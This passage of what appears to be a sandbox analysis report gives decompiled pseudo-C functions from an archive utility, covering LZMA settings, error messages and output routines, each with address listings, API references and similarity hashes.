								_t58 = _t58 + 1;
								_t60 = _t60 + 8;
								__eflags = _t58 - _t42;
								if(__eflags != 0) {
									continue;
								} else {
									goto L8;
								}
								goto L9;
							}
						}
						L9:
						_t24 = _t60 + 4; // 0x0
						_t61 =  *_t24;
					} else {
						_t61 =  *((intOrPtr*)(_t63 + 0xc));
						__eflags = _t61 - 0x10000;
						if(_t61 >= 0x10000) {
							goto L4;
						}
					}
					E003B1E40(_t33,  *((intOrPtr*)(_t63 - 0x18)));
					_t37 = _t61;
				} else {
					_t37 =  *((intOrPtr*)(_t63 + 0xc));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
				return _t37;
			}












                                                                                                    0x003c253d
                                                                                                    0x003c2545
                                                                                                    0x003c2547
                                                                                                    0x003c254b
                                                                                                    0x003c2550
                                                                                                    0x003c2554
                                                                                                    0x003c256b
                                                                                                    0x003c2573
                                                                                                    0x003c2578
                                                                                                    0x003c257b
                                                                                                    0x003c2580
                                                                                                    0x003c2582
                                                                                                    0x003c258f
                                                                                                    0x003c2592
                                                                                                    0x003c259c
                                                                                                    0x003c25a1
                                                                                                    0x003c25a1
                                                                                                    0x003c25a4
                                                                                                    0x003c25c1
                                                                                                    0x003c25c1
                                                                                                    0x003c25c7
                                                                                                    0x003c25cc
                                                                                                    0x003c25d1
                                                                                                    0x003c25d4
                                                                                                    0x003c25d9
                                                                                                    0x003c25da
                                                                                                    0x003c25a6
                                                                                                    0x003c25a6
                                                                                                    0x003c25ab
                                                                                                    0x003c25b0
                                                                                                    0x003c25b5
                                                                                                    0x003c25b7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c25b9
                                                                                                    0x003c25ba
                                                                                                    0x003c25bd
                                                                                                    0x003c25bf
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c25bf
                                                                                                    0x003c25ab
                                                                                                    0x003c25df
                                                                                                    0x003c25df
                                                                                                    0x003c25df
                                                                                                    0x003c2584
                                                                                                    0x003c2584
                                                                                                    0x003c2587
                                                                                                    0x003c258d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c258d
                                                                                                    0x003c25e5
                                                                                                    0x003c25eb
                                                                                                    0x003c2556
                                                                                                    0x003c2556
                                                                                                    0x003c2556
                                                                                                    0x003c25f3
                                                                                                    0x003c25fb

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003C253D
                                                                                                    • _CxxThrowException.MSVCRT(?,00431428), ref: 003C25DA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionH_prologThrow
                                                                                                    • String ID: Unsupported charset:
                                                                                                    • API String ID: 461045715-616772432
                                                                                                    • Opcode ID: f28bc2a68a472fea01d68090d9c1dce7c16ac6bd260db7b1dcad017d656391ed
                                                                                                    • Instruction ID: ffd678045f9205b8f719ae09804eb7548c4477b61e182a0a48488afadc8a2935
                                                                                                    • Opcode Fuzzy Hash: f28bc2a68a472fea01d68090d9c1dce7c16ac6bd260db7b1dcad017d656391ed
                                                                                                    • Instruction Fuzzy Hash: 1021F332A000099BCF06EF98C8A1EEFB7B1EF4A314F15416DE955AB251CB35AD46CB80
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E4F41 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003E4F41(intOrPtr __ecx, signed int __edx) {
				intOrPtr* _t43;
				signed int _t59;
				signed int _t63;
				signed int _t64;
				void* _t67;

				E0041F1B0(E00426000, _t67);
				 *((intOrPtr*)(_t67 - 0x14)) = __ecx;
				_t59 = __edx;
				 *((intOrPtr*)(_t67 - 0x18)) = 0;
				E003B2690(_t67 - 0x24);
				 *((intOrPtr*)(_t67 - 4)) = 0;
				 *(_t67 - 0x10) = 0;
				_t43 = 0x42c234;
				do {
					_t63 = 1;
					_t64 = _t63 <<  *(_t67 - 0x10);
					if((_t59 & _t64) != 0) {
						 *((intOrPtr*)(_t67 - 0x18)) =  *_t43;
						if( *((intOrPtr*)(_t67 - 0x20)) != 0) {
							E003B2834();
						}
						E003B284C(_t67 - 0x24,  *((intOrPtr*)(_t67 - 0x18)));
						_t59 = _t59 &  !_t64;
					}
					 *(_t67 - 0x10) =  *(_t67 - 0x10) + 1;
					_t43 = _t43 + 4;
				} while (_t43 < 0x42c260);
				if(_t59 != 0) {
					 *((char*)(_t67 - 0x34)) = 0x30;
					 *((char*)(_t67 - 0x33)) = 0x78;
					L003B1977(_t59, _t67 - 0x32);
					_t78 =  *((intOrPtr*)(_t67 - 0x20));
					if( *((intOrPtr*)(_t67 - 0x20)) != 0) {
						E003B2834();
					}
					E003B284C(_t67 - 0x24, _t67 - 0x34);
				}
				E003B1E40(E003B26EC( *((intOrPtr*)(_t67 - 0x14)), _t78, _t67 - 0x24),  *((intOrPtr*)(_t67 - 0x24)));
				 *[fs:0x0] =  *((intOrPtr*)(_t67 - 0xc));
				return  *((intOrPtr*)(_t67 - 0x14));
			}








                                                                                                    0x003e4f46
                                                                                                    0x003e4f50
                                                                                                    0x003e4f56
                                                                                                    0x003e4f5b
                                                                                                    0x003e4f5e
                                                                                                    0x003e4f63
                                                                                                    0x003e4f66
                                                                                                    0x003e4f69
                                                                                                    0x003e4f6e
                                                                                                    0x003e4f73
                                                                                                    0x003e4f74
                                                                                                    0x003e4f78
                                                                                                    0x003e4f80
                                                                                                    0x003e4f83
                                                                                                    0x003e4f88
                                                                                                    0x003e4f88
                                                                                                    0x003e4f93
                                                                                                    0x003e4f9a
                                                                                                    0x003e4f9a
                                                                                                    0x003e4f9c
                                                                                                    0x003e4f9f
                                                                                                    0x003e4fa2
                                                                                                    0x003e4fac
                                                                                                    0x003e4fb3
                                                                                                    0x003e4fb7
                                                                                                    0x003e4fbb
                                                                                                    0x003e4fc0
                                                                                                    0x003e4fc4
                                                                                                    0x003e4fc9
                                                                                                    0x003e4fc9
                                                                                                    0x003e4fd5
                                                                                                    0x003e4fd5
                                                                                                    0x003e4fe9
                                                                                                    0x003e4ff8
                                                                                                    0x003e5000

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: 0$x
                                                                                                    • API String ID: 3519838083-1948001322
                                                                                                    • Opcode ID: 3b128996fb08251828fe9ee858f51bb49cbd16c17b90f5ba4931a275ef9d793a
                                                                                                    • Instruction ID: 427c7a356e395616e74018fddac7e9656563822765fbad0a9f3c729a854024de
                                                                                                    • Opcode Fuzzy Hash: 3b128996fb08251828fe9ee858f51bb49cbd16c17b90f5ba4931a275ef9d793a
                                                                                                    • Instruction Fuzzy Hash: CF216D32D01169DBCF06EBD4D991AEEF7B5EF48708F10026AE501BB281DB755E05CBA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E8DC4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003E8DC4(intOrPtr __ebx) {
				intOrPtr _t25;
				intOrPtr* _t29;
				intOrPtr _t34;
				struct _IO_FILE** _t37;
				intOrPtr _t39;
				intOrPtr* _t56;
				void* _t58;

				_t39 = __ebx;
				_t56 =  *0x43a894; // 0x43a5b0
				if(_t56 == __ebx) {
					_t56 = 0x43a5b0;
				}
				_t25 = E003E4194(_t58 - 0x2a4,  *((intOrPtr*)(_t58 - 0x110)),  *_t56);
				 *((intOrPtr*)(_t58 - 0x20)) = _t25;
				if(_t25 == 1) {
					E003B1FA0(_t56);
					_t37 =  *0x43a898; // 0x43a5a0
					if(_t37 != _t39) {
						fputs("\nDecoding ERROR\n",  *_t37);
					}
					 *((intOrPtr*)(_t58 - 0x28)) = 2;
					 *((intOrPtr*)(_t58 - 0x20)) = _t39;
				}
				if( *((char*)(_t58 - 0x334)) != 0 &&  *0x43a894 != 0) {
					E003EA7A4();
				}
				E003B1E40(E003EA789( *((intOrPtr*)(_t58 - 0x20))),  *((intOrPtr*)(_t58 - 0xcc)));
				 *(_t58 - 4) = 6;
				L003D1EAB(_t58 - 0xc0);
				_t29 =  *((intOrPtr*)(_t58 - 0x2c));
				 *(_t58 - 4) = 4;
				_t66 = _t29;
				if(_t29 != 0) {
					_t29 =  *((intOrPtr*)( *_t29 + 8))(_t29);
				}
				 *(_t58 - 4) = 2;
				E003B1E40(_t29,  *((intOrPtr*)(_t58 - 0xdc)));
				E003B11C2(_t58 - 0x108);
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				E003EAC28(_t39, _t58 - 0x340, _t66);
				 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
				E003D0A72(_t39, _t58 - 0x6c);
				_t34 =  *((intOrPtr*)(_t58 - 0x28));
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				return _t34;
			}










                                                                                                    0x003e8dc4
                                                                                                    0x003e8dc4
                                                                                                    0x003e8dcc
                                                                                                    0x003e8dce
                                                                                                    0x003e8dce
                                                                                                    0x003e8de1
                                                                                                    0x003e8de9
                                                                                                    0x003e8dec
                                                                                                    0x003e8df4
                                                                                                    0x003e8df9
                                                                                                    0x003e8e00
                                                                                                    0x003e8e09
                                                                                                    0x003e8e10
                                                                                                    0x003e8e11
                                                                                                    0x003e8e18
                                                                                                    0x003e8e18
                                                                                                    0x003e9a41
                                                                                                    0x003e9a4c
                                                                                                    0x003e9a4c
                                                                                                    0x003e9a5f
                                                                                                    0x003e9a65
                                                                                                    0x003e9a6f
                                                                                                    0x003e9a74
                                                                                                    0x003e9a77
                                                                                                    0x003e9a7b
                                                                                                    0x003e9a7d
                                                                                                    0x003e9a82
                                                                                                    0x003e9a82
                                                                                                    0x003e9a8b
                                                                                                    0x003e9a8f
                                                                                                    0x003e9a9b
                                                                                                    0x003e9aa0
                                                                                                    0x003e9aaa
                                                                                                    0x003e9aaf
                                                                                                    0x003e9ab6
                                                                                                    0x003e9abb
                                                                                                    0x003e9ac4
                                                                                                    0x003e9acc

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputs
                                                                                                    • String ID: Decoding ERROR$S
                                                                                                    • API String ID: 1795875747-3281273935
                                                                                                    • Opcode ID: 948db944f8eb91b6c53dc40cbffc99ebd661b4edad1628ae9311e3e64f3b7b38
                                                                                                    • Instruction ID: 4fe7fc97c207188ec699b431d6ae161f20fcf74c05c1df939674fa466c838415
                                                                                                    • Opcode Fuzzy Hash: 948db944f8eb91b6c53dc40cbffc99ebd661b4edad1628ae9311e3e64f3b7b38
                                                                                                    • Instruction Fuzzy Hash: 9C21D031D001A8DBDF2BEB95D8857ECB7B1AF58304F1042AAE449AB1E1CB346E84CB15
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003F9287 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 95%
                                                                                                    			E003F9287(void* __ecx) {
				intOrPtr* _t23;
				void* _t30;
				void* _t32;
				void* _t51;

				E0041F1B0(E0042774C, _t51);
				if( *((char*)(__ecx + 0x93)) != 0) {
					E003CCBDD(_t51 - 0x30);
					 *(_t51 - 4) =  *(_t51 - 4) & 0x00000000;
					E003B2711(_t51 - 0x24, "LZMA");
					_t23 = L003BDF02(_t51 - 0x30, __eflags);
					_t7 = _t23 + 8; // 0x8
					 *((char*)(_t23 + 4)) = 1;
					 *_t23 = 9;
					E003B91E5(_t7, "BT2");
					E003BD15F(_t51 - 0x30, 0xf, 5);
					E003BD15F(_t51 - 0x30, 8, 0x111);
					E003BD15F(_t51 - 0x30, 1, 0x100000);
					E003BD15F(_t51 - 0x30, 0xd, 1);
					_t30 = E003F9248(E003FAAEA( *((intOrPtr*)(_t51 + 8)), __eflags), _t51 - 0x30);
					_t15 = _t51 - 4;
					 *_t15 =  *(_t51 - 4) | 0xffffffff;
					__eflags =  *_t15;
					L003C9708(_t51 - 0x30);
					_t32 = _t30;
				} else {
					_t32 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t51 - 0xc));
				return _t32;
			}







                                                                                                    0x003f928c
                                                                                                    0x003f929e
                                                                                                    0x003f92aa
                                                                                                    0x003f92af
                                                                                                    0x003f92bb
                                                                                                    0x003f92c3
                                                                                                    0x003f92cd
                                                                                                    0x003f92d0
                                                                                                    0x003f92d4
                                                                                                    0x003f92da
                                                                                                    0x003f92e6
                                                                                                    0x003f92f5
                                                                                                    0x003f9304
                                                                                                    0x003f9310
                                                                                                    0x003f9324
                                                                                                    0x003f9329
                                                                                                    0x003f9329
                                                                                                    0x003f9329
                                                                                                    0x003f9332
                                                                                                    0x003f9337
                                                                                                    0x003f92a0
                                                                                                    0x003f92a0
                                                                                                    0x003f92a0
                                                                                                    0x003f933d
                                                                                                    0x003f9345

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: BT2$LZMA
                                                                                                    • API String ID: 3519838083-1343681682
                                                                                                    • Opcode ID: 827bca30dc53ec81c917ac8e9f83091eb917ab5798701c5eb9b0066962f3cc99
                                                                                                    • Instruction ID: e8c215b895d779e91432d75b163743e21e53778e3dbe3573511ec27416a05f8e
                                                                                                    • Opcode Fuzzy Hash: 827bca30dc53ec81c917ac8e9f83091eb917ab5798701c5eb9b0066962f3cc99
                                                                                                    • Instruction Fuzzy Hash: 4C118231A70218BEDB0AEB64DC57FEC7770AF14B04F404069F6066B5D2EBB45A08C714
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E7485 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003E7485(struct _IO_FILE** __ecx, void* __edx, void* __ebp, intOrPtr _a4) {
				struct _IO_FILE** _t35;
				intOrPtr _t36;

				_t36 = _a4;
				_t35 = __ecx;
				if( *((char*)(_t36 + 0x21)) == 0) {
					if( *(_t36 + 0x3c) < 0) {
						fputs("Cannot open the file as archive",  *__ecx);
						goto L5;
					} else {
						_t4 = _t36 + 0x24; // 0x3ebcbc
						E003B210C(_t4);
						E003B1FA0(__ecx);
						_t5 = _t36 + 0x3c; // 0x42e4e868
						E003E73C6(__ecx,  *((intOrPtr*)( *((intOrPtr*)(__edx + 8)) +  *_t5 * 4)) + 0x10, 0);
					}
				} else {
					fputs("Cannot open encrypted archive. Wrong password?",  *__ecx);
					L5:
				}
				E003B1FA0(_t35);
				E003B1FA0(_t35);
				_t9 = _t36 + 0x30; // 0x3ebcc8
				E003E7422(_t35, _t9);
				return 0;
			}





                                                                                                    0x003e7487
                                                                                                    0x003e748e
                                                                                                    0x003e7494
                                                                                                    0x003e74a3
                                                                                                    0x003e74d5
                                                                                                    0x00000000
                                                                                                    0x003e74a5
                                                                                                    0x003e74a5
                                                                                                    0x003e74ab
                                                                                                    0x003e74b2
                                                                                                    0x003e74b7
                                                                                                    0x003e74c7
                                                                                                    0x003e74c7
                                                                                                    0x003e7496
                                                                                                    0x003e74d5
                                                                                                    0x003e74d5
                                                                                                    0x003e74dc
                                                                                                    0x003e74df
                                                                                                    0x003e74e6
                                                                                                    0x003e74eb
                                                                                                    0x003e74f0
                                                                                                    0x003e74fa

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • Cannot open the file as archive, xrefs: 003E74D0
                                                                                                    • Cannot open encrypted archive. Wrong password?, xrefs: 003E7498
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputs
                                                                                                    • String ID: Cannot open encrypted archive. Wrong password?$Cannot open the file as archive
                                                                                                    • API String ID: 1795875747-1623556331
                                                                                                    • Opcode ID: 08e8ceec78751eb30337ce02146182bde26813fdc3e67733b3c4b66959e0b219
                                                                                                    • Instruction ID: b4ed9ac5a2a25c85f9c016e1e6cf918f12b5d923cbda0b0bba84c2a88a10158c
                                                                                                    • Opcode Fuzzy Hash: 08e8ceec78751eb30337ce02146182bde26813fdc3e67733b3c4b66959e0b219
                                                                                                    • Instruction Fuzzy Hash: 8C0126313182509BCB06E6669491A7EB7A7AFC8304F98421BF6028BAC1DF78A801DF51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B5642 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 89%
                                                                                                    			E003B5642(long __ecx, void* __edx) {
				short _v8;
				void* _t8;

				_push(__ecx);
				_t16 = __edx;
				if(__ecx != 0x8007054f) {
					if(FormatMessageW(0x1300, 0, __ecx, 0,  &_v8, 0, 0) != 0) {
						E003B2ECB(_t16, _v8);
						LocalFree(_v8);
						goto L5;
					} else {
						_t8 = 0;
					}
				} else {
					E003B302D(__edx, "Internal Error: The failure in hardware (RAM or CPU), OS or program");
					L5:
					_t8 = 1;
				}
				return _t8;
			}





                                                                                                    0x003b5645
                                                                                                    0x003b564d
                                                                                                    0x003b564f
                                                                                                    0x003b5677
                                                                                                    0x003b5682
                                                                                                    0x003b568a
                                                                                                    0x00000000
                                                                                                    0x003b5679
                                                                                                    0x003b5679
                                                                                                    0x003b5679
                                                                                                    0x003b5651
                                                                                                    0x003b5658
                                                                                                    0x003b5690
                                                                                                    0x003b5690
                                                                                                    0x003b5690
                                                                                                    0x003b5694

                                                                                                    APIs
                                                                                                    • FormatMessageW.KERNEL32(00001300,00000000,?,00000000,00000000,00000000,00000000,?,?,?,003B55AC,00000000,00000000), ref: 003B566F
                                                                                                    Strings
                                                                                                    • Internal Error: The failure in hardware (RAM or CPU), OS or program, xrefs: 003B5651
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FormatMessage
                                                                                                    • String ID: Internal Error: The failure in hardware (RAM or CPU), OS or program
                                                                                                    • API String ID: 1306739567-2427807339
                                                                                                    • Opcode ID: 75198ece6443c8d2067dda6c4b22e259407b90b85518263f6828bc03280296f0
                                                                                                    • Instruction ID: 5519adeb4a81b8806a5878ad5a52eb35fb0508721a0611b5db598e8a5457103b
                                                                                                    • Opcode Fuzzy Hash: 75198ece6443c8d2067dda6c4b22e259407b90b85518263f6828bc03280296f0
                                                                                                    • Instruction Fuzzy Hash: 7AE02BB0700614BBAF1B2B508C06FFF73ACDA44708B905114FE0295910FA905F0256B8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E70DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003E70DD(struct _IO_FILE** __ecx, signed int __edx) {
				char _v20;
				char* _t7;
				struct _IO_FILE** _t14;

				_t14 = __ecx;
				if(__edx >= 0x69) {
					L003B18AD(__edx,  &_v20);
					_t7 =  &_v20;
				} else {
					_t7 =  *(0x42c7b8 + __edx * 4);
				}
				fputs(_t7,  *_t14);
				return fputs(" = ",  *_t14);
			}






                                                                                                    0x003e70ea
                                                                                                    0x003e70ec
                                                                                                    0x003e70fc
                                                                                                    0x003e7101
                                                                                                    0x003e70ee
                                                                                                    0x003e70ee
                                                                                                    0x003e70ee
                                                                                                    0x003e710d
                                                                                                    0x003e711e

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputs
                                                                                                    • String ID: =
                                                                                                    • API String ID: 1795875747-2525689732
                                                                                                    • Opcode ID: fe7ca745dae2f28263a77b8fd934c48f7808c2a0008d989bb4ef82dac2d25d89
                                                                                                    • Instruction ID: 00cdb07c103f5532509a98fda254ab0562e9c3f985f0916adc5b5bbf908349dd
                                                                                                    • Opcode Fuzzy Hash: fe7ca745dae2f28263a77b8fd934c48f7808c2a0008d989bb4ef82dac2d25d89
                                                                                                    • Instruction Fuzzy Hash: 55E0D831B0012557DF06B79A9C458BE3B69FBC0314B940833E910D7290E730DC22CBE4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E839E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003E839E(struct _IO_FILE** __ecx, char* __edx, intOrPtr _a4, intOrPtr _a8) {
				struct _IO_FILE** _t12;

				_t12 = __ecx;
				fputs(__edx,  *__ecx);
				fputs(0x42cfc8,  *_t12);
				return E003B1FA0(E003B2201(_t12, _a4, _a8));
			}




                                                                                                    0x003e839f
                                                                                                    0x003e83ab
                                                                                                    0x003e83b4
                                                                                                    0x003e83d1

                                                                                                    APIs
                                                                                                    • fputs.MSVCRT ref: 003E83AB
                                                                                                    • fputs.MSVCRT ref: 003E83B4
                                                                                                      • Part of subcall function 003B2201: fputs.MSVCRT ref: 003B221E
                                                                                                      • Part of subcall function 003B1FA0: fputc.MSVCRT ref: 003B1FA7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputs$fputc
                                                                                                    • String ID: Archives
                                                                                                    • API String ID: 1185151155-454332015
                                                                                                    • Opcode ID: 960f2b82e8f2bf9880737a2f6d72bdd770a0c361a926509fe5a44d9b1424d585
                                                                                                    • Instruction ID: 58ab41adcfc9a3cdab72a428e5767d0b3a23b6547ca72b300b874523de9c9999
                                                                                                    • Opcode Fuzzy Hash: 960f2b82e8f2bf9880737a2f6d72bdd770a0c361a926509fe5a44d9b1424d585
                                                                                                    • Instruction Fuzzy Hash: 7ED02B3230021067CB117FA99C05C6FBAA6EFD47107460C1FF980471A0CA714C20DFA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041648C Relevance: 5.2, APIs: 4, Instructions: 156COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 97%
                                                                                                    			E0041648C(intOrPtr* __esi) {
				signed int _t132;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				signed int* _t144;
				signed int _t146;
				signed int _t148;
				signed int* _t153;
				intOrPtr _t159;
				signed int _t164;
				intOrPtr _t170;
				signed int _t175;
				intOrPtr _t180;
				signed int _t181;
				signed int _t183;
				signed int _t186;
				signed int _t198;
				intOrPtr _t206;
				intOrPtr _t209;
				intOrPtr _t219;
				signed int _t229;
				struct _CRITICAL_SECTION* _t232;
				intOrPtr* _t234;
				intOrPtr _t238;
				signed int _t242;
				intOrPtr _t243;
				void* _t245;
				void* _t272;

				_t234 = __esi;
				while(1) {
					_t181 =  *(_t245 + 0x34);
					if( *(_t234 + 0x38) != 0) {
						break;
					}
					_t229 = E00416D10(_t234 + 0x208);
					 *((intOrPtr*)(_t245 + 0x14)) = 0;
					 *((intOrPtr*)(_t245 + 0x24)) = 0;
					 *(_t245 + 0x10) = 1;
					if(_t229 == 0) {
						_t206 =  *_t234;
						 *((intOrPtr*)(_t245 + 0x14)) = _t206;
						if( *((intOrPtr*)(_t234 + 0x10)) == 0) {
							_t181 =  *(_t234 + 0x18);
							_t243 =  *((intOrPtr*)(_t234 + 0xb0));
							_t219 =  *((intOrPtr*)(_t234 + 0xb4));
							_t170 = _t181 - _t243;
							if(_t206 > _t170) {
								_t206 = _t170;
								 *((intOrPtr*)(_t245 + 0x14)) = _t206;
							}
							_t238 = _t243 + _t206;
							asm("adc edx, 0x0");
							 *((intOrPtr*)(_t245 + 0x24)) =  *((intOrPtr*)(_t234 + 0x14)) + _t243;
